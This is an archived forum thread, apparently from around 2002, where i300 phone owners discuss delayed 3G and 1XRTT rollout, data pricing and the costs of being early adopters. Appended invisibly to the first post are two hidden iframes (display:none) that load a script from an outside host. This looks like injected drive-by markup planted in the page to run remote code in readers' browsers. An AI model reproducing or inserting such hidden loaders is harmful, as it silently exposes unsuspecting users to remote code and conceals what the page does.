+ Reply to Thread
Page 1 of 2 1 2 LastLast

Oh, To Be an Early Adopter!

OK. With 3G said to be imminent, and the lack of I-300 upgradeability, can anyone explain to me why we all just didn't wait for the "I-400"? How appealing will our now-spiffy phones be once 3G is up and running?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Imminent? How do you figure? Not to be a jerk, but I wouldnt expect to see 3g before 2004.... Just like Free fast internet, HDTV... Afterall how long did it take sprint to come out with wireless web?

Administrator

Arrow

3g is already out on verizon (according to them, they are the first in the US to have it) and sprint will release it sometime in the first-second quarter '02... the main problem is the lack of handsets ready to take advantage of 3g...

i got the i300 because i wanted the latest and greatest... i knew about 3g technology a year ago but that did not stop me from getting the 6035!

HDTV? man, thats another story all together...

Even if Sprint did happen to roll out 3G services in your area in the near future, would the phones be accepable to you? Would the service plans be acceptable to you? Suppose you have to pay $89/month just to get started with wireless internet? Or they charge for bytes transferred rather than connect time (VoiceStream does it). You might actually prefer what you have now.

Bear in mind that the implementation and the timetable for doing so has never yet lived up to the hype -- and the fact that Sprint isn't even hyping these services is a reasonable indication of how far away they really are in most markets.

Anyway: I bought this phone because it met my criteria -- integrated color wireless palm and phone (for little more $ than some Palm-compatibles alone: Clie anyone?), compact and comfortable form factor, ability to exchange email, and hit basic, lightweight web pages, and a good platform for developing and testing networked Palm apps. I don't know what's going to happen the day after tomorrow. It doesn't matter; this phone is suitable right now.

OK, now I feel better. <G>

The VERY first 1XRTT data coverage available to general subscribers MIGHT be ready by mid-year, in some limited metropolitan areas; general availability in most metropolitan areas from either Sprint PCS or Verizon will take longer.

To date, to the best of my knowledge neither Sprint PCS or
    Verizon have made any public announcements of:

1.) Timetables and corresponding coverage area maps for
    1XRTT data service rollout.

2.) Pricing plans for service - these may well be on a per packet / bundled basis, i.e., X amount of Mb downloaded for X amount of
    $$$. The cost may wind up being more than you'd like.

3.) Any form of actual guaranteed data rate; although 1XRTT is theoretically capable of 153.6 Kbps (that's bits!) the actual data
    rate may be limited on a per connection basis, or by sheer number of users divided by the network backbone feed. It WILL be less than 153.6 Kbps.

Until the questions above are answered by the CDMA carriers, you
    might be better off with your current handset and service plan -
    if the max data rate turns out to be 32-40 Kbps, and they want
    $40-50 extra a month for that, is that really a better deal than current 14.4 Kpbs service using your minutes?????

I also bought the phone knowing that it would not be 3G compatible.... so what. I also had a 6035 and it was obsolete in 6 months. I go thru cell phones like crazy. My wife thinks I am crazy. I am not sure that I need to have the latest and greatest like ol' Marc..... but this phone has made me more money than it has cost. Nothing like being out with the guys, having a client call w/a problem, dial up to his network, telnet to his machine, fix the problem, and send out a bill, all with a Guineuss in my hand!

Wireless technology will be fast and furious over the next several years. You did not put off the purchase of a PC because you knew it would be obsolete in a week did you? By technology today for what your needs are today. When something better comes out, you judge if the betterness is worth the time/price, etc. to be worth while to you.

Sprint has been saying 3G will start rolling out the end of 2001, well here we are in 2002 and we see no hype. I agree with the other comment here, if they were close, we'd be sick of all the hype. It will come, but my i300 will be obsolete before it does hit the market. I do know there are some 3G implementations out there, I have heard that ATT wireless has it up in Seattle (I think).

Somebodys gotta test out all this technology, it may as well be me!
    Carl

To answer the last post, AT&T put up a grand total of two GPRS stations on existing TDMA towers and enabled 10 Motorola handsets so they could make the announcement that they had rolled out the "first" available GPRS service in North America, "scooping" VoiceStream, based in Seattle who were rolling out a nationwide GPRS network the following month.....

Believe it when you see the posters in CircuitCity / Best Buy / Radio Shack.....

OK, dumb question time.... mr Hack, what is 1XRTT? Also, thanks for the info. Looks like I may have the i300 in my pocket longer than I thought.
    Carl

"You did not put off the purchase of a PC because you knew it would be obsolete in a week did you? By technology today for what your needs are today. When something better comes out, you judge if the betterness is worth the time/price, etc. to be worth while to you."

Really good point, Carl. Lets face it. We're all tech fiends and are so aroused by the best, whatever that may be. We do have a good quality product though, I believe. Though we may have fun and fantasize about what would make it perfect, its pretty damn good.

Thanks for putting this all in perspective.

Re: Oh, To Be an Early Adopter!

Originally posted by phil
    OK. With 3G said to be imminent, and the lack of I-300 upgradeability, can anyone explain to me why we all just didn't wait for the "I-400"? How appealing will our now-spiffy phones be once 3G is up and running?
    Because I can just buy that too? I assume most of the people here had no problem dropping 400$ on a cool phone, so we won't have much trouble doing it again...

mk

Administrator

Arrow

400? shoot, more like500+.. the 6035 costs 500+ when i got it.. so i spent over a grand on phones in 6 months....

ooh the price for being one of the first on the block...

Until the questions above are answered by the CDMA carriers, you
    might be better off with your current handset and service plan -
    if the max data rate turns out to be 32-40 Kbps, and they want
    $40-50 extra a month for that, is that really a better deal than current 14.4 Kpbs service using your minutes?????
    well, someone has to bite the bullet for technology.. if we were to all wait for the infrastructure to get better.. it would never happen.. so in order to improve technology, we need to dive in... us early adopters are the ones that make things happen... thats why DTV is stalling...thats why DAT and MD and DCC machines fell off.. no one was willing to adpot into them..

oops.. i got off track... :o

bascially what im saying, WHEN sprint offers 3G to its customers.. i will be one of the first... i love technology man....

Ya, I paid 399 on sale at CircuitCity, but after the tax, sprint fees, service, fee, fees, I think my total startup was 520ish... \
    I had vowed to never get another cell contract, I was really happy with verizon prepaid, but... well, I had to have the i300..

Is 6560 i300 my model number? What are the differences?

Mk

Originally posted by Marctronixx
    400? shoot, more like500+.. the 6035 costs 500+ when i got it.. so i spent over a grand on phones in 6 months....

ooh the price for being one of the first on the block...

well, someone has to bite the bullet for technology.. if we were to all wait for the infrastructure to get better.. it would never happen.. so in order to improve technology, we need to dive in... us early adopters are the ones that make things happen... thats why DTV is stalling...thats why DAT and MD and DCC machines fell off.. no one was willing to adpot into them..

oops.. i got off track... :o

bascially what im saying, WHEN sprint offers 3G to its customers.. i will be one of the first... i love technology man....

Administrator

Arrow

yo sky, i htink you misuderstood me...

our i300 is model sph-i300. the 6035 is the kyocera 6035 phone/pda. i was saying i paid well over 500+ for those phones. i got the 6035 in april and turned around and bought the i300 in october. :p

but both phones were 499 PERIOD. not rebates or offers...

Originally posted by Marctronixx
    yo sky, i htink you misuderstood me...

our i300 is model sph-i300. the 6035 is the kyocera 6035 phone/pda. i was saying i paid well over 500+ for those phones. i got the 6035 in april and turned around and bought the i300 in october. :p

but both phones were 499 PERIOD. not rebates or offers...
    Ahh, yes, i misunderstood... it's too early to be computering. 'hey, where's my tab. Oh, no time for that, the computers starting.'

It was really the color screen that drew me to the PDA phone concept...
    I got my i300 in late dec...

mk

Marc:
    You must not be counting accessories. I also have bought 2 6035s and an i300 this year. But I have easily spend over 200 buck on each phone for accessories. Being an early adopter is not cheap. But you are correct. If early adopter do not accept technology, they fade away. Basically we are beta testing things that the "dumb masses" (say it fast) will all have in a few years. I await 3G. Will I be first, you betcha. I think wireless is VERY cool. I have had a cell phone since around 1990, an analog Panasonic transportable. It mounted in my car, but could be removed so I could be mobile (the phone was about 8"x11"x3"). I used it for almost 9 years. I did not see any real benefit switching from analog to digital. I could not see spending more money on a new handset. I basically had a car phone. But when the new PCS services came out here in Atlanta, I looked at ATT and thought it was very cool. Sprint was a little later into the game here. I saw how the little flip phone could help me get rid of my pager..... in short, there was a reason to adopt the new technology. BTW, ATT really sucked here in ATL, so I switched to Sprint. Everyone I knew w/Sprint always had very cool phones. The rest is history. The phone quickly became my most important tool, even more than my laptop.
    Carl

Since we're all confessing, I paid 600 on each of my I300's early on and have spent a @%$ load of money on headsets, software, cases. I don't even have a laptop currently! I guess that IS the cost of being one of the first.

Administrator

Arrow

yo carl...

yeah i was not evenn mnentioning the $$$spent on accessories..

but i had the SAME exact phone you first had: the panasonic one with the old long camera battery.. had a handle on the side! i loved that phone!!!! that was thru att...

but my "bestest" phone in the whole world: the SIMON. exclusively for bellsouth mobility by IBM... you rememebr that one?? it was THE first phone/pda out there back in 1994!! had its on memory card slot (2MB card and 1.8 MB cards) i wont go into detail.. but i loved that phone.... the REAL phone-o-philes should rememebr that phone...

ahhhh those were the days....

:p

=(

One of the nice things about working at comp usa is a discount. Even though i dont wrok there anymore, i still get it =), 309 bucks at their cost. Any cell accessorie are dirt cheap, that 40 dollar headset that is in the headset post is 10 bucks at cost. Everyone go get jobs at best buy and Comp usa, the discount alone is worth it. Spend all that hard earned money that you make on your day jobs and buy stuff at cost at comp.
    over and out....

Everyone go get jobs at best buy and Comp usa...
    Or better yet, buddy up with Killy and convince to hook ya up!